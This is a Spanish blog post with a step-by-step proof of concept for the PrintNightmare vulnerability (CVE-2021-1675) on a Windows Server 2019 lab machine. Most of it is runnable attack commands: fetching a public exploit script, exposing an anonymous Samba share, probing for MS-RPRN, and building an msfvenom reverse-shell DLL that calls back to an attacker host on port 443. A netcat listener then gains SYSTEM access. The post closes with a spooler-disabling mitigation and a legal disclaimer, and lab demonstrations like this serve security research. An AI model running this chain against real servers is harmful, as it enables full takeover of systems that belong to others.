Pues parece ser que esta vulnerabilidad es crítica y que está dando mucho que hablar. En esta entrada vamos a ver una prueba de concepto para ver como un atacante malicioso podría llegar a hacerse System (cuenta con mayor privilegio en Windows). Si quieres saber como lo hacemos, sigue leyendo!
En esta POC, vamos a utilizar impacket, así que, si no lo tienes instalado en tu distribución preferida de pentesting, puedes instalarlo.
Una vez que estemos en un directorio de trabajo, clonamos el siguiente script de python:
wget https://raw.githubusercontent.com/cube0x0/CVE-2021-1675/main/CVE-2021-1675.py
Veamos la parte del servidor Windows 2019 con systeminfo:
Vamos a modificar el fichero smb.conf que se encuentra en /etc/samba/smb.conf, para permitir el acceso anónimo. No te olvides de hacer un backup del fichero antes de tocarlo.
Arrancamos el servicio de smbd:
systemctl start smbd
Y el nmbd:
systemctl start nmbd
Con esto ya tenemos listo SMB.
Comprobamos con rpcdump.py que el servidor es vulnerable:
rpcdump.py @192.168.15.165 | grep MS-RPRN
Sabiendo que es vulnerable, vamos a ver que nos pide el script:
python3 CVE-2021-1675.py
Como nos indica, necesitamos una dll para poder llevar a cabo el ataque. Para ello, vamos a generar una con MSFvenom:
msfvenom -f dll -p windows/x64/shell_reverse_tcp LHOST=192.168.15.128 LPORT=443 -o culo.dll
Una vez creada la dll, vamos a ejecutar el script con los parámetros que muestra el ejemplo y cambiándolos por los nuestros:
python3 CVE-2021-1675.py laboratorio.local/akil3s:123abc.@192.168.15.165 '\192.168.15.128\smb\culo.dll'
Solo nos queda poner un netcat a la escucha en el puerto 443 que es donde nos devolverá la reversa:
Como se puede observar, ya somos system. Esto entraña un grave peligro, ya que se podría llegar a hacer cualquier cosa.
Por el momento no hay parche, ya que se trata de una vulnerabilidad Zero-Day, así que, toca deshabilitar la cola de impresión del servidor o desinstalar el servicio de impresión.
Como no he tenido mucho tiempo, el servidor no estaba actualizado completamente, pero en cuanto duerma unas horas, actualizo y pruebo de nuevo (aunque ya he leído que funciona igual estando actualizado por completo)
Entrada basada en el artículo https://github.com/cube0x0/CVE-2021-1675
NO uses esta información para realizar ataques a servidores que no sean tuyos, ya que es un delito y podría salirte caro. Esto solo es para fines de investigación.
Nos vemos en la siguiente.
0 comentarios:
Publicar un comentario